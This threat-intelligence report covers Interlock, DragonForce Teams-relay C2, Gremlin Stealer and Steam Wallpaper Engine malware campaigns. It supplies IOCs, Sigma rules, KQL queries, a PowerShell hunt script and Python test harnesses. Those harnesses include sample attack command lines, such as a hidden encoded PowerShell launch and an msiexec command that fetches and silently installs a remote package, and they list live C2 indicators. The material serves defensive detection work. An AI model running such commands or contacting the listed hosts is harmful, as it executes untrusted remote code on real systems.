Recent OTX Pulse data shows several concurrent campaigns that pair credential theft with new initial-access tradecraft. Security Arsenal analysts have identified multiple active campaigns using "living-off-the-land" (LotL) techniques to bypass traditional network defenses.
The primary threat landscape is dominated by Hive0163 (Interlock) and Rhysida actors preparing for ransomware operations via custom loaders like NodeSnake and InterlockRAT. Simultaneously, the DragonForce threat actor has been observed abusing legitimate Microsoft Teams relay infrastructure (CVE-2025-61155, CVE-2025-1055) to obscure Backdoor.Turn C2 traffic. In parallel, Gremlin Stealer variants are evolving with advanced VM-based packing, while the Steam Workshop ecosystem is being weaponized to deliver Vidar and Lumma stealers via malicious wallpapers.
The collective objective of these campaigns is credential harvesting, establishing persistent C2 channels, and financial extortion through ransomware or crypto-mining (observed in UAT-8616's Cisco SD-WAN exploitation).
Threat Actor / Malware Profile
Hive0163 / Interlock & Rhysida
- Objective: Ransomware deployment and data exfiltration.
- Malware: NodeSnake, InterlockRAT, JunkFiction (downloader), Supper, Broomstick (loader), Tomb (crypter).
- Distribution: Trojanized installers and phishing campaigns.
- Behavior: NodeSnake provides remote access; JunkFiction downloads subsequent payloads. The actors use Tomb to encrypt malicious binaries to evade static analysis.
DragonForce
- Objective: Remote access and credential theft leading to ransomware.
- Malware: Backdoor.Turn (Go-based RAT).
- Distribution: Exploitation of vulnerabilities (CVE-2025-61155) and social engineering.
- C2 Obfuscation: Leverages Microsoft Teams TURN relay servers. By using anonymous visitor tokens, the traffic looks like legitimate *.teams.microsoft.com or relay.microsoft.com traffic and passes egress filtering that allowlists Microsoft endpoints.
Gremlin Stealer
- Objective: Infostealing (payment cards, browser data, session tokens).
- Malware: Gremlin Stealer (often bundled with Agent Tesla, Lokibot).
- Technique: Uses commercial packing utilities with instruction virtualization. Payloads are hidden in embedded resource sections and executed via a custom private virtual machine (PVM).
Steam Wallpaper Engine Campaign
- Objective: Gaming account hijacking and credential theft.
- Malware: DarkComet (also tracked as DarkKomet and Fynloski), Lumma, Vidar.
- Distribution: Malicious projects uploaded to Steam Workshop. Users download "live wallpapers" that execute embedded scripts.
- Behavior: The Wallpaper Engine executes the wallpaper script, which drops and executes the stealer payload.
IOC Analysis
The provided indicators represent a high-risk mix of network infrastructure and known malicious artifacts:
- Domains/URLs: leadslaw.com (Interlock C2/related); Dropbox and Google Drive URLs used in the Steam campaigns for payload delivery. Block leadslaw.com outright, block the specific file-sharing URLs rather than the Dropbox/Google Drive domains wholesale, and inspect DNS logs for historical resolutions.
- File Hashes: A significant volume of SHA256, MD5, and SHA1 hashes are provided for payloads such as Backdoor.Turn, Gremlin Stealer, and XenShell. Import them immediately into EDR detection rules and SIEM correlation engines.
- CVEs:
- CVE-2023-36036: Windows Cloud Files Mini Filter Driver elevation of privilege (a local privilege-escalation bug, not an Exchange Server flaw).
- CVE-2025-61155 / CVE-2025-1055: Vulnerabilities related to Microsoft Teams relay abuse.
- CVE-2026-20128 / CVE-2026-20133: Cisco Catalyst SD-WAN vulnerabilities (Authentication Bypass).
- IPs: 185.196.9.234 (historical C2).
Operationalizing IOCs:
- Firewall/Proxy: Block all listed domains and IP ranges. Flag any egress traffic to relay.microsoft.com that does not originate from the Teams client (Teams.exe or ms-teams.exe).
- EDR: Query for the specific file hashes. Hunts should focus on processes spawned by wallpaper32.exe (Steam Wallpaper Engine) and on unsigned Go binaries.
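The IOC matching described above, written out as an added Python example (not code from the original page or the pulse): it runs the page's domain, IP and SHA256 indicators against constructed DNS-resolver and EDR records. Domains are matched on label boundaries so that cdn.leadslaw.com hits but leadslaw.com.example.net does not, and hashes are compared case-insensitively because different tools emit different case. All log lines, hostnames and paths below are constructed; only the indicator values come from the page.

```python
"""Added example (not from the original page): match the pulse's domain, IP
and SHA256 IOCs against constructed log data. Domain matching is done on label
boundaries, so 'cdn.leadslaw.com' matches but 'leadslaw.com.example.net' does
not, and hashes are compared case-insensitively. The IOC values are the ones
on the page; every log line below is constructed for illustration."""

IOC_DOMAINS = {"leadslaw.com"}
IOC_IPS = {"185.196.9.234"}
IOC_SHA256 = {
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",  # InterlockRAT
    "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531",  # Backdoor.Turn
}


def domain_matches(qname, blocklist):
    """Return the blocklisted domain that qname equals or is a subdomain of, else None."""
    q = qname.lower().rstrip(".")
    for d in blocklist:
        d = d.lower()
        if q == d or q.endswith("." + d):
            return d
    return None


# Constructed resolver log: time client action type qname answer
DNS_LOG = """\
2026-06-17T09:12:01Z 10.0.4.22 query A www.microsoft.com 20.70.246.20
2026-06-17T09:12:05Z 10.0.4.22 query A cdn.leadslaw.com 185.196.9.234
2026-06-17T09:13:11Z 10.0.4.31 query A leadslaw.com.example.net 203.0.113.9
2026-06-17T09:14:40Z 10.0.4.57 query A LEADSLAW.COM. 185.196.9.234
"""


def hunt_dns(log_text):
    """Flag any query whose name is a listed domain/subdomain or whose answer is a listed IP."""
    hits = []
    for line in log_text.splitlines():
        ts, client, _action, _rtype, qname, answer = line.split()
        dom = domain_matches(qname, IOC_DOMAINS)
        ip_hit = answer in IOC_IPS
        if dom or ip_hit:
            hits.append({"ts": ts, "client": client, "qname": qname,
                         "answer": answer, "domain_ioc": dom, "ip_ioc": ip_hit})
    return hits


# Constructed EDR file events; the second record carries an upper-case hash as some tools emit.
EDR_EVENTS = [
    {"host": "WS-017", "path": r"C:\Users\bob\Downloads\setup.exe",
     "sha256": "0f" * 32},  # benign, not on the list
    {"host": "WS-042", "path": r"C:\ProgramData\svc\agent.exe",
     "sha256": "333903C7D22A27098E45FC64B77A264AA220605CFBD3E329C200D7E4B42C881C"},
    {"host": "WS-042", "path": r"C:\Users\bob\AppData\Local\Temp\t.exe",
     "sha256": "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531"},
]


def hunt_hashes(events, ioc_hashes=IOC_SHA256):
    """Return (host, path) for every event whose SHA256 is on the list, case-insensitively."""
    wanted = {h.lower() for h in ioc_hashes}
    return [(e["host"], e["path"]) for e in events if e["sha256"].lower() in wanted]


if __name__ == "__main__":
    for h in hunt_dns(DNS_LOG):
        print("DNS hit:", h)
    for host, path in hunt_hashes(EDR_EVENTS):
        print("Hash hit:", host, path)
```

The label-boundary check matters in practice: a plain `"leadslaw.com" in qname` substring test would also fire on attacker-controlled lookalikes and, worse, on unrelated names that merely contain the string, which is how blocklist rules end up tuned out.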
Detection Engineering
Sigma Rules
---
title: Potential Steam Wallpaper Engine Malicious Spawning
id: 3f8b5c2e-1a9b-4c3d-9e5f-6a7b8c9d0e1f
description: Detects suspicious processes spawned by Steam Wallpaper Engine, a known vector for Vidar and Lumma delivery.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\wallpaper32.exe'
  filter_legit:
    Image|endswith:
      - '\wallpaper32.exe'
      - '\steamwebhelper.exe'
      - '\gameoverlayui.exe'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate third-party wallpaper tools (rare)
level: high
---
title: DragonForce Backdoor.Turn Teams Relay Traffic
id: a1b2c3d4-5678-40ef-8a1b-c2d3e4f5a6b7
description: Detects potential Backdoor.Turn C2 traffic leveraging Microsoft Teams TURN relay servers from processes other than the Teams client. Covers TCP/443 only; TURN over UDP/3478 needs a firewall or NetFlow rule.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection_dst:
    DestinationHostname|contains:
      - 'relay.microsoft.com'
      - 'teams.microsoft.com'
  selection_port:
    DestinationPort: 443
  filter_legit:
    Image|endswith:
      - '\Teams.exe'
      - '\Microsoft.Teams.exe'
      - '\msteams.exe'
      - '\ms-teams.exe'
  condition: selection_dst and selection_port and not filter_legit
falsepositives:
  - Browsers running Teams in a tab, Outlook and other Office apps that contact teams.microsoft.com; add them to filter_legit once their signed install path is confirmed
level: critical
---
title: Interlock Rhysida JunkFiction Downloader Activity
id: b2c3d4e5-6789-41f0-9a2b-d3e4f5a6b7c8
description: Detects msiexec, rundll32 or regsvr32 launched with a remote URL and an install or javascript: argument, an execution pattern associated with the JunkFiction downloader and InterlockRAT installers.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66545b2c1e0409586c19a2f9
tags:
  - attack.defense_evasion
  - attack.t1218.007
  - attack.t1218.010
  - attack.t1218.011
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\msiexec.exe'
      - '\rundll32.exe'
      - '\regsvr32.exe'
  selection_url:
    CommandLine|contains:
      - 'http://'
      - 'ftp://'
  selection_opts:
    CommandLine|contains:
      - '/i'
      - 'javascript:'
  condition: all of selection_*
falsepositives:
  - Legitimate software installation from an internal HTTP share
level: medium
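The three rules above, re-implemented as plain Python predicates and run over constructed Sysmon-style events, as an added example that is not part of the original page or its Sigma rules. It shows exactly what each selection/filter pair matches and misses: Sigma `contains` and `endswith` are case-insensitive, so every comparison lowercases first, and the Teams allowlist is a parameter so the page's filter list can be compared with one extended to cover the new Teams binary, ms-teams.exe. All paths, the 198.51.100.7 URL and the event records are constructed, not observed indicators.

```python
"""Added example (not part of the original page or its Sigma rules): the three
detection rules as Python predicates evaluated over constructed Sysmon-style
events. Sigma 'contains'/'endswith' are case-insensitive, so every comparison
lowercases first. The Teams allowlist is a parameter: the page's list, and an
extended one that also covers the new Teams client binary ms-teams.exe."""

PAGE_TEAMS_FILTER = ("\\teams.exe", "\\microsoft.teams.exe", "\\msteams.exe")
EXTENDED_TEAMS_FILTER = PAGE_TEAMS_FILTER + ("\\ms-teams.exe",)
WALLPAPER_HELPERS = ("\\wallpaper32.exe", "\\steamwebhelper.exe", "\\gameoverlayui.exe")
LOLBINS = ("\\msiexec.exe", "\\rundll32.exe", "\\regsvr32.exe")


def rule_wallpaper_spawn(ev):
    """Rule 1: wallpaper32.exe as parent, child not one of its own helpers."""
    if ev["EventType"] != "process_creation":
        return False
    parent = ev["ParentImage"].lower()
    image = ev["Image"].lower()
    return parent.endswith("\\wallpaper32.exe") and not image.endswith(WALLPAPER_HELPERS)


def rule_teams_relay(ev, teams_filter=PAGE_TEAMS_FILTER):
    """Rule 2: TCP/443 to Teams/TURN relay hosts from anything not on the Teams allowlist."""
    if ev["EventType"] != "network_connection":
        return False
    host = ev["DestinationHostname"].lower()
    image = ev["Image"].lower()
    if not any(s in host for s in ("relay.microsoft.com", "teams.microsoft.com")):
        return False
    if ev["DestinationPort"] != 443:
        return False
    return not any(s in image for s in teams_filter)


def rule_junkfiction(ev):
    """Rule 3: msiexec/rundll32/regsvr32 with a remote URL plus an install or javascript: argument."""
    if ev["EventType"] != "process_creation":
        return False
    image = ev["Image"].lower()
    cl = ev["CommandLine"].lower()
    return (image.endswith(LOLBINS)
            and any(s in cl for s in ("http://", "ftp://"))
            and any(s in cl for s in ("/i", "javascript:")))


def run_rules(events, teams_filter=PAGE_TEAMS_FILTER):
    """Return (event id, rule name) for every rule that fires on each event."""
    hits = []
    for ev in events:
        if rule_wallpaper_spawn(ev):
            hits.append((ev["id"], "wallpaper_spawn"))
        if rule_teams_relay(ev, teams_filter):
            hits.append((ev["id"], "teams_relay"))
        if rule_junkfiction(ev):
            hits.append((ev["id"], "junkfiction"))
    return hits


# Constructed events; paths and the 198.51.100.7 URL are illustrative, not observed IOCs.
WE = r"C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine"
SAMPLE_EVENTS = [
    {"id": 1, "EventType": "process_creation", "ParentImage": WE + r"\wallpaper32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 2, "EventType": "process_creation", "ParentImage": WE + r"\wallpaper32.exe",
     "Image": r"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe",
     "CommandLine": "steamwebhelper.exe --type=renderer"},
    {"id": 3, "EventType": "network_connection", "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "DestinationHostname": "relay.microsoft.com", "DestinationPort": 443},
    {"id": 4, "EventType": "network_connection", "Image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
     "DestinationHostname": "relay.microsoft.com", "DestinationPort": 443},
    {"id": 5, "EventType": "network_connection", "Image": r"C:\Program Files\WindowsApps\MSTeams\ms-teams.exe",
     "DestinationHostname": "relay.microsoft.com", "DestinationPort": 443},
    {"id": 6, "EventType": "network_connection", "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "DestinationHostname": "relay.microsoft.com", "DestinationPort": 3478},  # TURN port: rule 2 is blind here
    {"id": 7, "EventType": "process_creation", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://198.51.100.7/update.msi /qn"},
    {"id": 8, "EventType": "process_creation", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Temp\app.msi /qn"},
]

if __name__ == "__main__":
    print("page filter:    ", run_rules(SAMPLE_EVENTS))
    print("extended filter:", run_rules(SAMPLE_EVENTS, EXTENDED_TEAMS_FILTER))
```

Two results are worth noting before deploying the rules as written. With the page's allowlist, event 5 (the new Teams client, ms-teams.exe) fires as a false positive because "\msteams.exe" and "\ms-teams.exe" are different substrings; the extended list clears it. Event 6 never fires because the rule pins DestinationPort to 443, so the same suspicious binary speaking TURN on 3478 is invisible to it and has to be caught at the firewall.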
KQL (Microsoft Sentinel)
// Hunt for DragonForce Teams Relay abuse and Steam Wallpaper Malware.
// Three separate queries; run each on its own.
// 1. Processes other than the Teams client contacting Teams/TURN relay infrastructure.
//    Browsers running Teams in a tab will appear here, so triage rather than auto-block.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("relay.microsoft.com", "teams.microsoft.com")
| where InitiatingProcessFileName !in~ ("Teams.exe", "ms-teams.exe", "msteams.exe")
| summarize Connections = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp), Urls = make_set(RemoteUrl, 10)
    by DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessSHA256, RemotePort
| order by Connections asc
// 2. Wallpaper Engine spawning anything other than its own helpers
DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName =~ "wallpaper32.exe"
| where FileName !in~ ("wallpaper32.exe", "steamwebhelper.exe", "gameoverlayui.exe")
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
// 3. Known hashes, whether written to disk or executed (case-insensitive match)
let Hashes = dynamic([
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",
    "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531",
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5",
    "fc586cad94e5a10dd5be6a6ae6096bd02dfbfd094365bec87e788ed0798d6f67"
]);
union
    (DeviceFileEvents
     | where Timestamp > ago(7d)
     | where SHA256 in~ (Hashes)
     | project Timestamp, DeviceName, Source = "file", FileName, FolderPath, SHA256),
    (DeviceProcessEvents
     | where Timestamp > ago(7d)
     | where SHA256 in~ (Hashes)
     | project Timestamp, DeviceName, Source = "process", FileName, FolderPath, SHA256)
| order by Timestamp desc
PowerShell Hunt Script
# IOC Hunter for Interlock, DragonForce, and Steam Malware Campaigns
# Checks for known file hashes, Wallpaper Engine child processes, and
# non-Teams processes with live connections to Teams/TURN relay hosts.
# Run from an elevated prompt for full process and connection visibility.
$TargetHashes = @(
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c", # InterlockRAT
    "1bd0a200528c82c6488b4f48dd6dbc818d48782a2e25ccd22781c5718c3f62f5", # Gremlin Stealer
    "8a4033425d36cd99fe23e6faef9764fbf555f362ebdb5b72379342fbbe4c5531", # Backdoor.Turn
    "fc586cad94e5a10dd5be6a6ae6096bd02dfbfd094365bec87e788ed0798d6f67"  # Steam Malware
)
$SuspiciousParents = @("wallpaper32.exe")                                   # Wallpaper Engine host process
$ExpectedChildren  = @("wallpaper32.exe", "steamwebhelper.exe", "gameoverlayui.exe")
$TeamsProcesses    = @("Teams", "ms-teams", "msteams", "outlook")           # ProcessName values allowed to reach the relays
$RelayDomains      = @("relay.microsoft.com", "teams.microsoft.com")
# The hash sweep is limited to the drop locations these loaders use; a full C:\ sweep takes hours.
$ScanPaths = @("$env:ProgramData", "$env:TEMP", "$env:LOCALAPPDATA", "$env:APPDATA",
               "$env:PUBLIC", "$env:USERPROFILE\Downloads") | Where-Object { Test-Path $_ }
Write-Host "[*] Starting Scan for IOCs..." -ForegroundColor Cyan
# 1. Scan drop locations for known file hashes
Write-Host "[*] Scanning file system for known malicious hashes..." -ForegroundColor Yellow
Get-ChildItem -Path $ScanPaths -Recurse -File -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 -and $_.Length -lt 200MB } |
    ForEach-Object {
        $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        # -contains is case-insensitive, so Get-FileHash's upper-case output still matches the list
        if ($hash -and $TargetHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | Hash: $hash" -ForegroundColor Red
        }
    }
# 2. Check for Wallpaper Engine acting as parent of anything but its own helpers
Write-Host "[*] Checking for suspicious process chains..." -ForegroundColor Yellow
$allProcs = Get-CimInstance Win32_Process
$parents  = $allProcs | Where-Object { $SuspiciousParents -contains $_.Name }
if ($parents) {
    foreach ($proc in $parents) {
        Write-Host "[!] Wallpaper Engine parent found: $($proc.Name) (PID: $($proc.ProcessId))" -ForegroundColor Yellow
        $allProcs | Where-Object { $_.ParentProcessId -eq $proc.ProcessId -and $ExpectedChildren -notcontains $_.Name } |
            ForEach-Object {
                Write-Host "  -> Unexpected child: $($_.Name) (PID: $($_.ProcessId)) Command: $($_.CommandLine)" -ForegroundColor Red
            }
    }
} else {
    Write-Host "[+] No Wallpaper Engine processes detected." -ForegroundColor Green
}
# 3. Network Connection Check (DragonForce Teams Relay)
# Map relay hostnames to IPs through the local DNS cache so that only connections to
# those hosts are flagged, rather than every 443 session on the box. Limits: the cache
# only holds recently resolved names, and Get-NetTCPConnection sees TCP only, so TURN
# over UDP/3478 is not covered here and needs a firewall or NetFlow check.
Write-Host "[*] Checking for connections to Teams Relay infrastructure..." -ForegroundColor Yellow
$relayIPs = @()
foreach ($entry in (Get-DnsClientCache -ErrorAction SilentlyContinue)) {
    foreach ($domain in $RelayDomains) {
        # keep only address records (skip CNAME targets) for names under the relay domains
        if ($entry.Entry -like "*$domain" -and $entry.Data -match '^[0-9a-fA-F.:]+$') { $relayIPs += $entry.Data }
    }
}
if (-not $relayIPs) {
    Write-Host "[+] No Teams relay hostnames in the DNS cache; nothing to correlate." -ForegroundColor Green
} else {
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $relayIPs -contains $_.RemoteAddress } |
        ForEach-Object {
            $owner = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            if ($owner -and $TeamsProcesses -notcontains $owner.ProcessName) {
                # Browsers running Teams in a tab land here too; triage by path and code signature.
                Write-Host "[!] Potential C2: $($owner.ProcessName) (PID: $($owner.Id), $($owner.Path)) -> $($_.RemoteAddress):$($_.RemotePort)" -ForegroundColor DarkYellow
            }
        }
}
Response Priorities
Immediate (0-4 hours):
- Blocking: Block all IOCs (IPs, Domains, URLs) at the perimeter firewall and proxy servers.
- Hunting: Run the provided PowerShell script on endpoints to identify dropped payloads.
- Network Isolation: Isolate any systems identified as communicating with 185.196.9.234 or resolving leadslaw.com.
Within 24 Hours:
- Identity Verification: If credential-stealing malware (Lumma, Vidar, Gremlin) is suspected, force a password reset, revoke active sessions and refresh tokens (a reset alone does not invalidate stolen session cookies), and enable MFA for all accounts used from the compromised endpoints.
- Steam Workshop Policy: Issue an immediate advisory to ban or restrict the use of "Steam Wallpaper Engine" and third-party workshops on corporate assets.
- Vulnerability Scanning: Scan for Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20128) and Microsoft Teams relay flaws (CVE-2025-61155).
Within 1 Week:
- Architecture Hardening: Restrict egress to *.teams.microsoft.com and relay.microsoft.com to the Teams client and browsers; any other process reaching those hosts is an alert, not a normal session.
- Application Control: Use AppLocker or WDAC to block execution from Wallpaper Engine project and Workshop content directories, and alert in EDR on wallpaper32.exe spawning powershell.exe or cmd.exe (AppLocker has no parent-process rules of its own, so the spawn detection belongs in EDR).
- Patch Management: Apply the Cisco SD-WAN and Microsoft patches for the CVEs referenced in the pulses.